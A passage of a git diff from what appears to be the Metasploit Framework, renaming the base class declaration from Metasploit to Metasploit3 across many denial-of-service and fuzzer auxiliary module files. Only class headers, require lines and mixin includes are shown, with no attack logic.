Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb index 5b0d01376b..a44a526850 100644 --- a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb +++ b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/tcp/synflood.rb b/modules/auxiliary/dos/tcp/synflood.rb index 166c5250fa..0ba1568205 100644 --- a/modules/auxiliary/dos/tcp/synflood.rb +++ b/modules/auxiliary/dos/tcp/synflood.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/upnp/miniupnpd_dos.rb b/modules/auxiliary/dos/upnp/miniupnpd_dos.rb index e3c70791b0..cee1464fe9 100644 --- a/modules/auxiliary/dos/upnp/miniupnpd_dos.rb +++ b/modules/auxiliary/dos/upnp/miniupnpd_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/appian/appian_bpm.rb b/modules/auxiliary/dos/windows/appian/appian_bpm.rb index ec8a8c8ead..9dfea04d72 100644 --- a/modules/auxiliary/dos/windows/appian/appian_bpm.rb +++ b/modules/auxiliary/dos/windows/appian/appian_bpm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb index eb56440b27..18ac1c4212 100644 --- a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb +++ b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb index 4fc7a87747..5686914817 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb index 31b6729340..b082718fe9 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb index c8afc2c219..8a2a932f4f 100644 --- a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb +++ b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb index f1168ce7bb..ac1e6022f9 100644 --- a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb +++ b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb b/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb index cdf45237bf..dc8ec4092e 100644 --- a/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb +++ b/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb index e222d7b09b..b2288b7b1c 100644 --- a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb +++ b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/titan626_site.rb b/modules/auxiliary/dos/windows/ftp/titan626_site.rb index 89f59f3e1e..e97dc9134f 100644 --- a/modules/auxiliary/dos/windows/ftp/titan626_site.rb +++ b/modules/auxiliary/dos/windows/ftp/titan626_site.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb index 36df63e63a..4db6db9836 100644 --- a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb +++ b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb index cc24d06cbd..b948914501 100644 --- a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb index d6dc497051..db9d2e31c5 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb index f2d349cead..ed94c74c86 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/games/kaillera.rb b/modules/auxiliary/dos/windows/games/kaillera.rb index dca8a370f6..c2fddc489a 100644 --- a/modules/auxiliary/dos/windows/games/kaillera.rb +++ b/modules/auxiliary/dos/windows/games/kaillera.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb index a80df49840..c1003c6a87 100644 --- a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb +++ b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb index d709bcbc06..daf6ad587d 100644 --- a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb +++ b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb index 206644e1f6..afb0eda518 100644 --- a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb +++ b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/nat/nat_helper.rb b/modules/auxiliary/dos/windows/nat/nat_helper.rb index 8c54d06f5f..09189c625e 100644 --- a/modules/auxiliary/dos/windows/nat/nat_helper.rb +++ b/modules/auxiliary/dos/windows/nat/nat_helper.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb index 9c514a595c..61ea317635 100644 --- a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb +++ b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb index 365c7afe65..79d649c253 100644 --- a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb +++ b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb index 69e7e1eeaf..fffd69b8dd 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb index 6c03b85f97..f60c224d7d 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb index 38aeb962ce..65d494e2a3 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb index d1ae6f884f..78ebe1e3af 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb index 8c38459cfd..fe436b7ef0 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb index 475b3b1534..692d3080de 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb index 18b823165f..25fec756b7 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb index cdf39d994a..51fa2bab02 100644 --- a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb +++ b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp #include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb index 6e3df8fe94..2ba38d2064 100644 --- a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb +++ b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb index 52b5535ecf..d514712000 100644 --- a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb +++ b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb index 12b66637c7..72166cc782 100644 --- a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb +++ b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb b/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb index ead38c3db2..de18f018d1 100644 --- a/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb +++ b/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/tftp/pt360_write.rb b/modules/auxiliary/dos/windows/tftp/pt360_write.rb index 943de69586..81f16d4860 100644 --- a/modules/auxiliary/dos/windows/tftp/pt360_write.rb +++ b/modules/auxiliary/dos/windows/tftp/pt360_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/tftp/solarwinds.rb b/modules/auxiliary/dos/windows/tftp/solarwinds.rb index db09b5c217..7be42e23eb 100644 --- a/modules/auxiliary/dos/windows/tftp/solarwinds.rb +++ b/modules/auxiliary/dos/windows/tftp/solarwinds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb index 5f69982b53..9eeb6b614a 100644 --- a/modules/auxiliary/dos/wireshark/capwap.rb +++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/chunked.rb b/modules/auxiliary/dos/wireshark/chunked.rb index 67c2c24faa..fa78ad8a42 100644 --- a/modules/auxiliary/dos/wireshark/chunked.rb +++ b/modules/auxiliary/dos/wireshark/chunked.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/cldap.rb b/modules/auxiliary/dos/wireshark/cldap.rb index 668a455b6d..63c678cc06 100644 --- a/modules/auxiliary/dos/wireshark/cldap.rb +++ b/modules/auxiliary/dos/wireshark/cldap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/ldap.rb b/modules/auxiliary/dos/wireshark/ldap.rb index c9177559ca..ee3f9bd317 100644 --- a/modules/auxiliary/dos/wireshark/ldap.rb +++ b/modules/auxiliary/dos/wireshark/ldap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb index c6673d5a6f..2d81a8f2c6 100644 --- a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb +++ b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'bit-struct' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/fuzzers/ftp/client_ftp.rb b/modules/auxiliary/fuzzers/ftp/client_ftp.rb index 272d87cecb..f28388b2f2 100644 --- a/modules/auxiliary/fuzzers/ftp/client_ftp.rb +++ b/modules/auxiliary/fuzzers/ftp/client_ftp.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Exploit::Remote::TcpServer diff --git a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb index 3e6c0fb306..00cf7bcdf5 100644 --- a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb +++ b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb index 8d31335aca..b115f6dd62 100644 --- a/modules/auxiliary/fuzzers/http/http_form_field.rb +++ b/modules/auxiliary/fuzzers/http/http_form_field.rb @@ -11,7 +11,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb index 39d470e833..7dfe8a5d26 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb index af93c72434..7f186ec68a 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb index d7663737cf..922de4aa88 100644 --- a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb +++ b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntp' require 'securerandom' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Fuzzer include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb index 60b6daf8e3..a6b195bf44 100644 --- a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb index a284f4e594..5d4486fc5e 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb index 1934230226..17ae41ffde 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb index 58361eb7b0..a47564f63f 100644 --- a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb index a4a6ed482b..22b0824f1f 100644 --- a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb index 4f839d9d04..a8eec1e014 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb index c8d6265fa1..de640033a7 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb index 3077e17d27..607d774e18 100644 --- a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb +++ b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb index cfe34b4e15..23d1f9cb56 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb index 02bb8a4665..fb5cad0492 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb index b9a67af0e9..fbb1368b86 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb +++ 